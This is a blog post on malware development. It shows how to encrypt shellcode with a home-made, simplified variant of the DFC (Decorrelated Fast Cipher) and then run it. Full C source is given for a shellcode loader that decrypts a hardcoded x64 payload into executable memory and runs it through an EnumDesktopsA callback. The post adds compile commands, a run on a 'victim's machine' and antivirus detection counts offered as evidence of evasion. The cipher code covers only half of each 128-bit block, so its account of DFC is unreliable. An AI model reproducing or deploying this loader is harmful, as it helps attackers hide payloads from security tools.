12 minute read

Hello, cybersecurity enthusiasts and white hackers!

cryptography

After my presentation and workshop at a conference in Luxembourg where I touched on the abuse of cryptographic functions in the internal structure of Windows OS, many colleagues and readers increasingly have questions about the use of cryptography in protecting malware during its development.

This post is the result of my own research on using DFC (Decorrelated Fast Cipher) on malware development. As usual, exploring various crypto algorithms, I decided to check what would happen if we apply this to encrypt/decrypt the payload.

DFC

The Decorrelated Fast Cipher (DFC) was developed in 1998 by cryptographers from the École Normale Supérieure, the CNRS, and France Telecom under the leadership of Serge Vaudenay. Designed as a candidate for the Advanced Encryption Standard (AES) competition, DFC is a symmetric block cipher using an 8-round Feistel network and a 128-bit block size. Though ultimately not selected as the AES standard, DFC contributed to cryptographic research, particularly in the PEANUT family of ciphers.

The Decorrelated Fast Cipher (DFC) based on an 8-round Feistel network, with each round processing a 128-bit block divided into two 64-bit halves. DFC uses a key schedule to generate 8 unique round keys from a variable-length key of up to 256 bits, while it is commonly implemented with a 128-bit key. Each round applies a particular encryption function to one half of the block, combines it with the other half, then swaps the halves - a classic Feistel structure that allows for simple decryption by reversing the sequence of the keys.

DFC’s architecture seeks to give excellent security against differential and linear cryptanalysis, and it is notable for using decorrelation theory, which reduces statistical relationships inside encrypted data in order to resist modern cryptographic assaults. Each round’s encryption function employs a pair of 64-bit subkeys derived from the main key, making the cipher suitable for hardware and software implementations.

Although DFC was not chosen as the final AES standard, it presented novel techniques to resisting decorrelation-based attacks, stressing strong security features for symmetric block ciphers. DFC is now a member of the larger PEANUT family (Pretty Encryption Algorithm with n-Universal Transformation), which is notable for using unique mathematical transformations to increase its resistance to cryptanalysis.

practical example

Let’s implement it in practice. Let’s break down the implementation step by step to understand how the DFC-based encryption and decryption functions need to be implemented, focusing on the encryption of a payload. This approach will help you understand each part of the code and how it contributes to the functionality of the DFC cipher.

First of all define constants and key variables:

#define ROUNDS 8
#define BLOCK_SIZE 16

Then we need key schedule generation.
The key schedule function generates eight 128-bit round keys based on the original encryption key. These round keys are used in each of the Feistel rounds to perform operations on each half of the data block:

void key_schedule(uint8_t* key) {
  for (int i = 0; i < ROUNDS; i++) {
    for (int j = 0; j < 16; j++) {
      K[i][j] = key[j] ^ (i + j);
    }
  }
}

The round keys are derived by XORing each byte of the main key with the round and byte indices, creating unique keys for each round.

The next one is implement the Feistel round function. In DFC, each round performs operations on the left and right halves of the block. The round function is defined as G, which takes the left and right halves of the block, and a roundKey.
This function: swaps the left and right halves and XORs the left half (after applying F function) with the right half and the current round key:

// DFC G function applies Feistel structure in each round
void G(uint32_t* left, uint32_t* right, uint8_t* roundKey) {
  uint32_t tempRight = *right;
  *right = *left ^ F(*right, *(uint32_t*)roundKey);
  *left = tempRight;
}

F is the core function of the Feistel structure. In my implementation, the F function for the Decorrelated Fast Cipher (DFC) round uses a bitwise rotation and XOR operation to introduce non-linearity and diffusion in each round:

// function F for DFC round (simplified for illustration)
uint32_t F(uint32_t left, uint32_t key_part) {
  return rotl(left + key_part, 3) ^ key_part;
}

Here, left param is typically the left half of the data block in the Feistel round, key_part is a 32-bit portion of the round key, specific to each Feistel round.

The main logic of this function is simple.

The left input (half of the data block) is added to the key_part. This addition introduces dependency on both the current data and the key, making each round sensitive to the specific round key.

The result of the addition is then rotated left by 3 bits (rotl(..., 3)). Bitwise rotation is used here to disperse the bits across the data, enhancing diffusion. The rotl function shifts bits to the left by 3 positions, with the leftmost bits wrapping around to the right.

Finally, the result of the rotation is XORed with key_part. XOR introduces further non-linearity and ensures that small changes in key_part or left lead to significant changes in the output of F.

The next function we needed is block encryption logic.

The dfc_encrypt function performs the encryption in a Feistel structure over 8 rounds. Each round uses a different round key generated from the key schedule:

// DFC encryption function
void dfc_encrypt(uint32_t* block, uint8_t* key) {
  uint32_t left = block[0], right = block[1];

  // perform 8 rounds of encryption
  for (int i = 0; i < ROUNDS; i++) {
    G(&left, &right, K[i]);
  }

  // final left-right swap
  block[0] = right;
  block[1] = left;
}

This function initializes left and right from the input block. Then for each of the 8 rounds, applies the G function to left and right with the corresponding round key. Finally, swaps left and right to complete the Feistel round and update the block.

The decryption function dfc_decrypt mirrors the encryption, but the rounds are applied in reverse order:

// DFC decryption function
void dfc_decrypt(uint32_t* block, uint8_t* key) {
  uint32_t left = block[0], right = block[1];

  // perform 8 rounds of decryption in reverse
  for (int i = ROUNDS - 1; i >= 0; i--) {
    G(&left, &right, K[i]);
  }

  // final left-right swap
  block[0] = right;
  block[1] = left;
}

As usual, dfc_encrypt_shellcode prepares shellcode for encryption by applying padding and then encrypting each 128-bit block:

// function to encrypt shellcode using DFC
void dfc_encrypt_shellcode(unsigned char* shellcode, int shellcode_len, uint8_t* key) {
  key_schedule(key);  // generate subkeys
  int i;
  uint32_t* ptr = (uint32_t*)shellcode;
  for (i = 0; i < shellcode_len / BLOCK_SIZE; i++) {
    dfc_encrypt(ptr, key);
    ptr += 4;  // move to the next 128-bit block (4 * 32-bit words)
  }
  // handle remaining bytes by padding with 0x90 (NOP)
  int remaining = shellcode_len % BLOCK_SIZE;
  if (remaining != 0) {
    unsigned char pad[BLOCK_SIZE] = { 0x90 };
    memcpy(pad, ptr, remaining);
    dfc_encrypt((uint32_t*)pad, key);
    memcpy(ptr, pad, remaining);
  }
}

This function calls key_schedule to initialize round keys. Then encrypts the main shellcode in 128-bit blocks. And applies padding if the shellcode length is not a multiple of the block size.

The next one is decryption logic:

// function to decrypt shellcode using DFC
void dfc_decrypt_shellcode(unsigned char* shellcode, int shellcode_len, uint8_t* key) {
  key_schedule(key);  // generate subkeys
  int i;
  uint32_t* ptr = (uint32_t*)shellcode;
  for (i = 0; i < shellcode_len / BLOCK_SIZE; i++) {
    dfc_decrypt(ptr, key);
    ptr += 4;
  }
  // handle remaining bytes by padding
  int remaining = shellcode_len % BLOCK_SIZE;
  if (remaining != 0) {
    unsigned char pad[BLOCK_SIZE] = { 0x90 };
    memcpy(pad, ptr, remaining);
    dfc_decrypt((uint32_t*)pad, key);
    memcpy(ptr, pad, remaining);
  }
}

Finally, putting it all together in main:

int main() {
  unsigned char my_payload[] = 
  "\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41"
  "\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60"
  "\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72"
  "\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"
  "\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2"
  "\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48"
  "\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f"
  "\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49"
  "\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01"
  "\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01"
  "\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1"
  "\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41"
  "\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
  "\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58"
  "\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
  "\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7"
  "\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e"
  "\x4c\x8d\x85\x25\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83"
  "\x56\x07\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
  "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
  "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
  "\xd5\x4d\x65\x6f\x77\x2d\x6d\x65\x6f\x77\x21\x00\x3d\x5e"
  "\x2e\x2e\x5e\x3d\x00";

  int my_payload_len = sizeof(my_payload);
  int pad_len = my_payload_len + (BLOCK_SIZE - my_payload_len % BLOCK_SIZE) % BLOCK_SIZE;
  unsigned char padded[pad_len];
  memset(padded, 0x90, pad_len);  // pad with NOPs
  memcpy(padded, my_payload, my_payload_len);

  printf("original shellcode:\n");
  for (int i = 0; i < my_payload_len; i++) {
    printf("%02x ", my_payload[i]);
  }
  printf("\n\n");

  uint8_t key[8] = { 0x12, 0x34, 0x56, 0x78, 0x9A, 0xBC, 0xDE, 0xF0 };

  dfc_encrypt_shellcode(padded, pad_len, key);

  printf("encrypted shellcode:\n");
  for (int i = 0; i < pad_len; i++) {
    printf("%02x ", padded[i]);
  }
  printf("\n\n");

  dfc_decrypt_shellcode(padded, pad_len, key);

  printf("decrypted shellcode:\n");
  for (int i = 0; i < my_payload_len; i++) {
    printf("%02x ", padded[i]);
  }
  printf("\n\n");

  // allocate and execute decrypted shellcode
  LPVOID mem = VirtualAlloc(NULL, my_payload_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  RtlMoveMemory(mem, padded, my_payload_len);
  EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, NULL);

  return 0;
}

As you can, see in the main function I just encrypted/decrypted meow-meow messagebox payload.

Full source code hack.c:

/*
 * hack.c
 * encrypt/decrypt payload via DFC (Decorrelated Fast Cipher) algorithm
 * author: @cocomelonc
 * https://cocomelonc.github.io/malware/2024/11/10/malware-cryptography-34.html
 */

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stdlib.h>
#include <windows.h>

#define ROUNDS 8       // DFC uses 8 rounds of encryption
#define BLOCK_SIZE 16  // DFC operates on 128-bit (16-byte) blocks

// subkeys generated from the main key
uint8_t K[ROUNDS][16];

// rotate left function
uint32_t rotl(uint32_t x, int shift) {
  return (x << shift) | (x >> (32 - shift));
}

// function F for DFC round (simplified for illustration)
uint32_t F(uint32_t left, uint32_t key_part) {
  return rotl(left + key_part, 3) ^ key_part;
}

// DFC G function applies Feistel structure in each round
void G(uint32_t* left, uint32_t* right, uint8_t* roundKey) {
  uint32_t tempRight = *right;
  *right = *left ^ F(*right, *(uint32_t*)roundKey);
  *left = tempRight;
}

// key schedule for DFC
void key_schedule(uint8_t* key) {
  for (int i = 0; i < ROUNDS; i++) {
    for (int j = 0; j < 16; j++) {
      K[i][j] = key[j % 8] ^ (i + j);  // generate subkey for each round
    }
  }
}

// DFC encryption function
void dfc_encrypt(uint32_t* block, uint8_t* key) {
  uint32_t left = block[0], right = block[1];

  // perform 8 rounds of encryption
  for (int i = 0; i < ROUNDS; i++) {
    G(&left, &right, K[i]);
  }

  // final left-right swap
  block[0] = right;
  block[1] = left;
}

// DFC decryption function
void dfc_decrypt(uint32_t* block, uint8_t* key) {
  uint32_t left = block[0], right = block[1];

  // perform 8 rounds of decryption in reverse
  for (int i = ROUNDS - 1; i >= 0; i--) {
    G(&left, &right, K[i]);
  }

  // final left-right swap
  block[0] = right;
  block[1] = left;
}

// function to encrypt shellcode using DFC
void dfc_encrypt_shellcode(unsigned char* shellcode, int shellcode_len, uint8_t* key) {
  key_schedule(key);  // generate subkeys
  int i;
  uint32_t* ptr = (uint32_t*)shellcode;
  for (i = 0; i < shellcode_len / BLOCK_SIZE; i++) {
    dfc_encrypt(ptr, key);
    ptr += 4;  // move to the next 128-bit block (4 * 32-bit words)
  }
  // handle remaining bytes by padding with 0x90 (NOP)
  int remaining = shellcode_len % BLOCK_SIZE;
  if (remaining != 0) {
    unsigned char pad[BLOCK_SIZE] = { 0x90 };
    memcpy(pad, ptr, remaining);
    dfc_encrypt((uint32_t*)pad, key);
    memcpy(ptr, pad, remaining);
  }
}

// function to decrypt shellcode using DFC
void dfc_decrypt_shellcode(unsigned char* shellcode, int shellcode_len, uint8_t* key) {
  key_schedule(key);  // generate subkeys
  int i;
  uint32_t* ptr = (uint32_t*)shellcode;
  for (i = 0; i < shellcode_len / BLOCK_SIZE; i++) {
    dfc_decrypt(ptr, key);
    ptr += 4;
  }
  // handle remaining bytes by padding
  int remaining = shellcode_len % BLOCK_SIZE;
  if (remaining != 0) {
    unsigned char pad[BLOCK_SIZE] = { 0x90 };
    memcpy(pad, ptr, remaining);
    dfc_decrypt((uint32_t*)pad, key);
    memcpy(ptr, pad, remaining);
  }
}

int main() {
  unsigned char my_payload[] = 
  "\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41"
  "\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60"
  "\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72"
  "\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"
  "\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2"
  "\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48"
  "\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f"
  "\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49"
  "\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01"
  "\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01"
  "\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1"
  "\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41"
  "\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
  "\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58"
  "\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
  "\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7"
  "\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e"
  "\x4c\x8d\x85\x25\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83"
  "\x56\x07\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
  "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
  "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
  "\xd5\x4d\x65\x6f\x77\x2d\x6d\x65\x6f\x77\x21\x00\x3d\x5e"
  "\x2e\x2e\x5e\x3d\x00";

  int my_payload_len = sizeof(my_payload);
  int pad_len = my_payload_len + (BLOCK_SIZE - my_payload_len % BLOCK_SIZE) % BLOCK_SIZE;
  unsigned char padded[pad_len];
  memset(padded, 0x90, pad_len);  // pad with NOPs
  memcpy(padded, my_payload, my_payload_len);

  printf("original shellcode:\n");
  for (int i = 0; i < my_payload_len; i++) {
    printf("%02x ", my_payload[i]);
  }
  printf("\n\n");

  uint8_t key[8] = { 0x12, 0x34, 0x56, 0x78, 0x9A, 0xBC, 0xDE, 0xF0 };

  dfc_encrypt_shellcode(padded, pad_len, key);

  printf("encrypted shellcode:\n");
  for (int i = 0; i < pad_len; i++) {
    printf("%02x ", padded[i]);
  }
  printf("\n\n");

  dfc_decrypt_shellcode(padded, pad_len, key);

  printf("decrypted shellcode:\n");
  for (int i = 0; i < my_payload_len; i++) {
    printf("%02x ", padded[i]);
  }
  printf("\n\n");

  // allocate and execute decrypted shellcode
  LPVOID mem = VirtualAlloc(NULL, my_payload_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  RtlMoveMemory(mem, padded, my_payload_len);
  EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, NULL);

  return 0;
}

As usual some printing logic is just for checking correctness of logic and running payload via EnumDesktopsA.

demo

Let’s go to see everything in action. Compile it (in my linux machine):

x86_64-w64-mingw32-gcc -O2 hack.c -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc

cryptography

Then, just run it in the victim’s machine (windows 11 x64 in my case):

.\hack.exe

cryptography

cryptography

As you can see, everything is worked perfectly! =^..^=

Calculating Shannon entropy:

python3 entropy.py -f hack.exe

cryptography

Our payload in the .text section.

Scanning via Malware scanner:

cryptography

cryptography

https://websec.net/scanner/result/8d7862b2-dbba-48bb-924c-a3694cac3269

Upload to VirusTotal:

cryptography

https://www.virustotal.com/gui/file/9d702d3194ef3a6160f9ab7f6b30ebaae92c365fa4c12368c7e9ec589ebbe1fd/detection

As you can see, only 29 of 72 AV engines detect our file as malicious.

Interesting result.

As you know, many of the encryption algorithms I have looked at in my research and on this blog are used Feistel networks.

cryptoanalysis

The cryptanalysis of Decorrelated Fast Cipher (DFC) has revealed vulnerabilities in its structure, particularly through differential analysis. In 1999, cryptographers Lars Knudsen and Vincent Rijmen (Lars R. Knudsen and Vincent Rijmen. “On The Decorrelated Fast Cipher (DFC) and Its Theory”. Department of Informatics, University of Bergen, N-5020 Bergen. 24 March 1999. 6th International Workshop on Fast Software Encryption (FSE ‘99). Rome: Springer-Verlag. pp. 81–94) discovered that DFC’s 8-round structure could be weakened using differential attacks. Their work demonstrated that a differential attack could successfully break 6 of DFC’s 8 rounds, exploiting the cipher’s susceptibility to differences introduced in specific parts of its Feistel rounds. This attack revealed weaknesses in the diffusion properties of DFC, indicating that, although designed for the AES competition, DFC was less resistant to cryptanalytic techniques than some other candidates.

I hope this post is useful for malware researchers, C/C++ programmers, spreads awareness to the blue teamers of this interesting encrypting technique, and adds a weapon to the red teamers arsenal.

https://en.wikipedia.org/wiki/DFC_(cipher)
On The Decorrelated Fast Cipher (DFC) and Its Theory. Lars R. Knudsen and Vincent Rijmen
Malware And Hunting For Persistence: How Adversaries Exploit Your Windows? - Cocomelonc. HACKLU 2024
Malware and cryptography 1
source code in github

This is a practical case for educational purposes only.

Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine